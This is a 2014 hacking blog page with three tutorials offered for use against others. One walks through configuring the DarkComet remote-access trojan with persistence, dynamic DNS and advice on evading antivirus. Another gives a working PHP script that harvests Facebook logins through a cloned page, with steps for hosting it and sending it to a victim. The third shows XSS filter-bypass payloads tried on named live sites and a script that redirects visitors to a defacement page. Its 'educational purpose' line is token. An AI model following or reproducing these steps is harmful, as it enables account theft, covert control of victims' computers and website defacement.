Breaking News

Facebook

Linux

Tools

Others

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Thursday, 15 May 2014

How to setup DarkComet RAT for Easy Access to a Target Computer

Note: In this format, the RAT program will quite easily be detected by anti-virus software. In order to evade such detection you will have to crypto the DarkComet RAT. It must become undetectable in order to use stealthily. Or, the attacker might install such a program and add exceptions to the anti-virus.
The newest versions are always the most stable. Let’s say you use DarkComet 3.2. DarkComet 3.2 will be quite old by the writing of this blog. The system functions may have changed. DarkCoderSc has updated it to DarkComet 5.3.2 with the latest functions, it’s like buying a can of Pepsi then finding it has gone-off.
Here is the tutorial on how to setup DarkComet 5.3.1
  1. Go to the DarkComet website (http://darkcomet-rat.com). I would not get this RAT from anywhere else, lest it be crawling with gremlins.
    At the top, you will see a list of items. Click Downloads.
    DarkComet-RAT-01
  2. Next there will be a list of DarkComet-RAT product versions.
    Click the top one.DarkComet-RAT-02
  3. When you click Download, you will see three boxes. Tick them.DarkComet-RAT-03
  4. Click Download.
  5. Open the DarkComet RAR (You need WinRAR)
    It should look like this:
    DarkComet-RAT-04
  6. Make a folder on your desktop. Name it anything you want.
    DarkComet-RAT-5
  7. Drag the items from the WinRAR folder to the Tutorial folder at your Desktop.
    Now, everything should be there like this:
    DarkComet-RAT-07
  8. Open DarkComet.exe (Run as Administrator)DarkComet-RAT-08
  9. A TOS should show up.
    DarkComet-RAT-09
    Tick the box saying ‘Do not display again the EULA‘ that is located at the bottom left. DarkComet-RAT-10
    Click ‘I accept‘  DarkComet-RAT-11
  10. At the bottom left, it will show up a Help Screen, tick ‘Do not show at startup‘ then click ‘FineDarkComet-RAT-12
  11. Click DarkComet-RAT at the top left.
    DarkComet-RAT-13
  12. Click ‘Listen to new port (+Listen)
    DarkComet-RAT-14
    A new window should open, put in your Port then tick ‘Try to forward automaticaly (UPNP)
    DarkComet-RAT-14.5
    IN this case, I will do port 70 so I put that in, tick ‘Try to forward automatically (UpNP)‘ and click Listen.
  13. Move over to ‘Socket / Net‘ located at the very end of the top left border.
    DarkComet-RAT-15
    You should see something like this:
    DarkComet-RAT-16
    70 may not be your port, your port that you added in ‘Listen to new port‘ will be displayed, not specifically 70.
  14. Go to ‘www.canyouseeme.org
    DarkComet-RAT-17
  15. Put in the port that you are listened on.
    If all went well, it should look like this:
    DarkComet-RAT-18
  16. Now, click DarkComet-RAT again and click Server Module, then click Full Editor (Expert)
    DarkComet-RAT-19
  17. Name your Security Password anything you like, then click the Mutex a few times. We then have the Main Settings done.
    DarkComet-RAT-20
    Make sure you untick FWB (Firewall Bypass)
  18. Go to Network Settings.
    Now, go to http://www.no-ip.com and register
    Click Free DNS
    DarkComet-RAT-21
  19. Put in whatever you want for it. Make sure the email is valid because we will need it to validate. (if you don’t want to give your email, get a temp email at 10minutemail.com)
    DarkComet-RAT-22
    Sign in now.
  20. Now, at the Body you will see a list of options, click ‘Add Host’
    DarkComet-RAT-23
  21. Copy the settings:
    DarkComet-RAT-24
    Leave IP Address, as that will show as Default your IP address.
  22. Click Create Host.
  23. Go back to your DarkComet and put in the Ip/DNS and Port (DNS for the NO-IP you made a second ago and Port for the one you listened on!)
    DarkComet-RAT-25
  24. Then click ‘Add‘ and go to Module Startup.
    Tick the ‘Start the stub with windows (module startup)’
    Then leave everything but ‘Persistance installation ( always come back )
    Tick that.
    Now, it should look like this:
    DarkComet-RAT-27
  25.  Now go to ‘Stub Finalization‘ at the end.
    If you are going to get it crypted then don’t tick UPX (Ultimate Packer Executable) but if you are, I would leave it off and just have it on No compression.
    DarkComet-RAT-28
  26. Now tick the ‘Save the profile when stub succesfully generated’ and Build the Stub.
    Now there is one last thing.
  27. Go to the Client Settings in DarkComet-RAT and then Click NO-IP Updater
    DarkComet-RAT-29
  28. Then put in the NO-IP host, Username and Password, then tick ‘Auto update your no-ip dns when your IP change
    DarkComet-RAT-30
  29. Now, run the stub that you generated in a Sandbox to test, and you should show up!
Here now, we have run through the entire thorough setup for DarkComet. Even your kid brother could follow this tutorial. Now what you need to do is some research into how to encrypt the EXE, so it can be installed remotely without an antivirus putting up a fuss. I know Metasploit has some pretty good encryption in it’s framework. I would start there. Watch out for others telling you they will encrypt it for you. This is usually a trick to just pack their own RAT into your stuff!
Read more ...
Ipinaskil ni sa 1 comment:
Mga etiketa: ,

How to hack Facebook with phishing page

As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.


phishing:


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

 FACEBOOK PHISHING....
facebook hack
                                                                         


steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.


                                          
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.
facebook phishing script
                                                  

                                            
4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .
hacking script
index

                                                    
8.Open a new notepad and save the given data with the name post.php.

 <?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

 9.You have two files now one is index.htm and another is post.php,remember file extension is important.

 10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

 11.I prefer u to use 000webhost because it will be easy to use.
                           
hosting website
                                              

 12.You have to make a account in that ,after that it looks like a picture given below.

facebook script hosting website
                                                                          
13.Now go control pannel,then on file manager.

 14.After that a new window will pop up.Now go to public_html.
                                           
                                        

 15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .

                                        
16.Now the last step click on view of index.htm it will look same as facebook page.

this is your Facebook phishing page
                                         

 17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

 18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                
                                        

 19.Click on view now u will have your friend's password and email id.
                                           

 20.This is a simple trick to hack any Facebook password account by phishing page.

note:

phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....



                                               

 Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....
Read more ...
Ipinaskil ni sa No comments:
Mga etiketa: ,

Monday, 12 May 2014

Find XSS Vuln's Like a Pro

What is XSS ? :

Cross-site scripting holes are web-application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern web browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

Read More at : http://en.wikipedia.org/wiki/Cross-site_scripting

Difference between Persistent and Non-Persistent XSS ? :

There is 2 Type's of XSS : Persistent and Non-Persistent ..

Non-Persistent : It is client sided, when you refresh the Page it will be gone.. It could be also Exploited to get the admin Cookie.. ( i wont be covering it in this tut) ..

Persistent : Server sided stick's to the page, and show's up to every one who visit's the site..

Where To find XSS ? :

XSS Vulnerabilities can be found in Search Box's, Login Page's : They can be found in every text Box that exist on the site's..
For sure, you cant find XSS vuln's on Google homepage Unless if you are lucky.. but it would take up to hour's to find one...

My First XSS Attack :

Before performing Your first XSS Attack, You need to know the Basic's ..

You cant Find XSS Attack's using Google chrome, Because it has an XSS Filter.. so download Fire-Fox !

Downlaod Mozila Here !

In order to find an XSS vuln you need to start your code with :


Code:
<script> </script>

if you are an HTML coder then, this will be easy as fuck for you..

now we need to define what we want the page to display, i this tut i will be covering up Alert Box's ..
There is on mouse Vuln's too.. i May add it to this tut later..

so our code (Base) is :


Code:
<script>alert(Your Text Here)</script>

for sure, and iam sure as fuck.. you wont find an XSS vuln on any website using this code..
Here come's the turn of the ByPassing..

How to ByPass XSS Filter's ?

There is 2 way's on how to ByPass XSS Filter in the search Bar's..
The most common one is using StringForCharCode ..
i will be covering that, and i may add other method's later..

StringFromCharCode method converts Unicode values into characters.

ByPassing Filter's :

First of all, Make sure you have Mozilla firefox.. You will need the Hack-Bar addon..
Here is the download Link :

Press me to download The Hack-Bar Mozilla Addon

Make sure, you are on Mozilla while downloading it..

Now, When u finished installing the Hack-Bar..
Re-start Mozilla fire-fox..

You will notice that the Bar is Installed, it should like like this :

[Image: TT5eH.png]

so, basically i will be showing you how to find XSS on Website's..
i will be using http://www.search-results.com ..
when ever i type something stupid into the URL Bar, i get directed to it..

So, i will be using it as my target..

Now Let's start..

Go to the hack bar, XSS Tab And StringForChar() Press it and enter Your text :

[Image: 2TWLL.png]

i entered TwinBlade-HF when you are done, Press Ok..

now, as i have stated Above.. the base is our key to Find XSS Vuln's..

and our Base was :


Code:
<script>alert(TwinBlade-HF)</script>

i guess it's obvious, the above code does not work?
Replace it with our string Function..

here is our base :


Code:
<script>alert()</script>

so, instead of the (text_here) we enter our StringFromChar() Text..

so, we can simple bypass the Filter..
it will look like :


Code:
<script>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</script>

Notice we have Made the StringFromCharCode() as text.. So at beginning of the StringFromCharCode() we Put a : Bracket


Code:
(

and there must be 2 Bracket's at the end of it..

Now, let's Find some vuln's on our Target :


Code:
www.search-results.com

Copy the above code and Head towards :

http://www.search-results.com/

And insert it at the main Page ..

and there Result is :

[Image: ELeJI.png]

Yeah, You just got trolled by the website..
Here come's the part on How to find XSS Vuln's Like a pro..

How to Find XSS Vulnerabilities like a Pro.

So, basically when i ever i type something in ur URL Bar, which isn't a website link..

it direct's me to it : http://www.search-results.com/

I am sure, you know what i mean..

Go go Go ! Enter your StringFromCharCode() Code into the URL Bar directly..

And Here is our Result ! :

[Image: HrdsQ.png]

Loosing Hope Ha ? Omg

Don't ! Cap's Lock Button !

Here is my point :


Code:
<script>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</script>

Goes to :


Code:
<SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

Try it, and you will simply Fail ! Hehe

Try adding some Char and symbol's at the Beginning :


Code:
<SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

Goes to :


Code:
";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

and try entering it at the URL Bar, as i said it will redirect You to search-Result

But, iam sure you will notice the Change :

[Image: Rixea.png]

But, if you tried entering it directly at the search HomePage.. then it won't work.. :

[Image: 8BPsT.png]

Now, this was one of the technique's .. Here is another One :

You can't Only, find XSS Vuln's at search Bar's..
as i told you before, it could by an textbox that the Box Include..
Now for this example i will use http://search.espn.go.com/

Don't worry, i havr reported it.. But lazy Bastard's is Lazy Mad
Did not even reply or fix it, so i will be using it in this Tutorial...

Go to :

http://search.espn.go.com/

Type anything in the search Bar, Something like test..

If you tried putting our XSS Statement directly.. It will give u an error..

So, here come's the trick...

Here is Our weapon :


Code:
";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

And here is our Target :

[Image: SElqf.png]

Try entering our weapon in the search :

[Image: MeDJW.png]

Yeah, You Got trolled.. ..

But in case you Have Not Notice, There is another text-box here.. :

[Image: AFaRo.png]

why dont u Go enter our weapon there? And then press enter? :

[Image: wY2GC.png]

Woot ! XSS ON Espn ..

Now, i will be mentioning another One ..

i will be using http://tumblrstation.com/ as a Target..

Now, i cant see any search text-Box's..

and for sure, login page is not only for user's to Login :P

Here, as there is no search Box's

Go to the Login page :

http://tumblrstation.com/user/login

and inject it with our code :


Code:
";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

[Image: 76tNP.png]

WOOT ! that was simple right?

Now, i may add more technique's/method's/way's Later On..

Defacing a website ? :


For defacing a website using XSS, Now before giving you the Code..
let me tell you something, you cant deface a website using Non-Persistent, You can deface it using an Persistent XSS Vulnerabilities ..

Persistent are Rare to Find, you will be lucky if you found One..

As i said before, Persistent XSS Vuln's show's up for every One :


Code:
<script>window.location="http://www.PasteHtml.com/DefaceCodeHere/";</script>

The code, pretty Much explain's itself.. Now.. You need a deface Page to deface a website that's Logic Hehe

Host, your deface Page at http://www.pastehtml.com

To Make one, you need to know HTML Coding..
Good Luck.. :D

Source: http://www.hackforums.net/showthread.php?tid=2539599&highlight=XSS+Tutorial
Read more ...
Ipinaskil ni sa No comments:
Mga etiketa:
Subscribe to: Posts (Atom)
© Geek Tricks by Aletheia | Designed By